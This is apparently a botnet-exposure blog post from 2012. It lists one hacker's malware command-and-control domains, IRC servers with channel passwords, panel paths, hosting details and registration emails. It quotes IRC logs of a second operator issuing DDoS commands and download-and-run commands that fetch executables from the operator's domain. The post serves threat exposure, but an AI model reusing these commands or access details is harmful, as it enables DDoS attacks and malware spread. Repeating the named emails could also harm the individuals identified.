Mystical Megapost (Botnets of all types) (Hosted by Ukraine Ukrainian Internet Names Center Ltd and Netherlands Maasdijk Worldstream)

As Mystical has now recently been banned from hackforums, I thought I would make an informative megapost of botnets he has or is currently using.

Domains
Bighecker.co
1212Mystic0801.info
Sonic4us.com
Sonic4me.com
img196-imageshack.us
rs-booter.com
modtech360.info
307dice.com
powerbot24.com
img90-imageshack.com
imageshells.com
bighecks.net

emails used for registration
hlolgame@aim.com
mikeydoc@hotmail.com #plug this into facebook to see his profile
highroller098765@hotmail.com
mikeshosting@yahoo.com
bram.fadzulani@mail.com

Botnets
IRC
Server: 1212Mystic0801.info
Port: 6667

Insomnia
Channel: #Insomnia 
Insomnia: 1212Mystic0801.info/6667 #Insomnia
* Topic for #insomnia is: .dl hxxp://dl.dropbox.com/u/103335012/6.exe
* Topic for #insomnia set by Mystical at Thu Sep 06 13:08:09 2012
 #insomnia        107
Nick format:  {VN|XP-32a}zpcuarp

Athena
Channel: #Boot
 #Boot            148
Nick format:  jan73101

Oper:
* [Mystical] (Mystical@sadie0801): …
* [Mystical] #insomnia @#opers
* [Mystical] irc.mystical.server :Mysticals Server
* [Mystical] is a Network Administrator
* [Mystical] is available for help.
* [Mystical] idle 03:12:20, signon: Fri Sep 07 11:45:44
* [Mystical] End of WHOIS list.

Server: 217.23.4.70
Port: 6667
Password: secret 

Athena
Channel: #skids
Channel Password: skid
 #skids           12      [+sntu]
Nick format: jan73101

ngr
Channel #NGR
Password: secret
 #NGR             282     [+sntu]
Nick format: {USA|XPa}qeegdvl

Oper:
* [Mystical] (Mystical@ngr123): …
* [Mystical] @#NGR
* [Mystical] irc.Gmen.com :Private
* [Mystical] idle 00:00:57, signon: Mon Sep 10 21:29:00
* [Mystical] End of WHOIS list.
* [Gwapo] (G@ngr123): Gwapo
* [Gwapo] @#NGR
* [Gwapo] irc.Gmen.com :Private
* [Gwapo] idle 14:03:08, signon: Mon Sep 10 07:26:26
* [Gwapo] End of WHOIS list.

HTTP

Smoke loader
rs-booter.com/new/index.php

DirtJumper
rs-booter.com/di/
rs-booter.com/dj/

Pandora
http://www.307dice.com/p/?u=7d6u6b8323020032423mdwbp1738o3m0

Zeus
rs-booter.com/zeus/cfg.bin
rs-booter.com/zeus/gate.php

Andromeda
217.23.4.70/http/image.php
sonic4us.com/plug/s.pack

Check bighecker.co/admin/ for all of the latest crypts for his bots.

Previous posts:
http://www.exposedbotnets.com/2012/04/vpsmodtech360infongrbot-hosted-in.html
http://www.exposedbotnets.com/2012/04/img196-imageshackushttp-malware-hosted.html

Hosting infos
Andromeda: http://whois.domaintools.com/217.23.4.70
Pandora:  http://whois.domaintools.com/89.248.172.24
ngrbot irc:  http://whois.domaintools.com/217.23.4.70
Insomnia irc: http://whois.domaintools.com/91.231.85.52
Former host for Zeus, dirtjumper and smokeloader: http://whois.domaintools.com/91.231.84.20

Edit:
You may have noticed that there was another oper on Mystical’s irc
server. That oper was Gwapo, a ddos kiddy from hackforums. It appears
that he was using Mystical’s botnet for his attacks.

Sep 10 04:36:44 <Gwapo>    !ssyn 212.25.7.233 80 3600
Sep 10 05:50:51 <Gwapo>    !udp 212.25.7.233 80 3600

Gwapo was also the one who loaded the pandora bots.
Sep 09 18:44:53 <Gwapo>    !dl http://bighecker.co/admin/pandora.exe

He loaded two other bots. One was Build.exe
Sep 10 07:27:40 <Gwapo>    !dl http://bighecker.co/admin/Build.exe
This was ipkiller, the latest evolution of hackforums host booters like metus or biozombie.
It connected to 199.19.105.99 on 1337
The other was 1111.exe
Sep 10 07:29:32 <Gwapo>    !dl http://bighecker.co/admin/1111.exe
This was again ipkiller, and it connected to i9i.us port 1337

i9i.us registration email: gwapo@programmer.net

So reassured that while Mystical has send the Pandora bots to parking, Gwapo can still hostbooter XBL for you.

Gwapo sample link

Gwapo hosting infos
http://whois.domaintools.com/173.242.120.47
http://whois.domaintools.com/199.19.105.99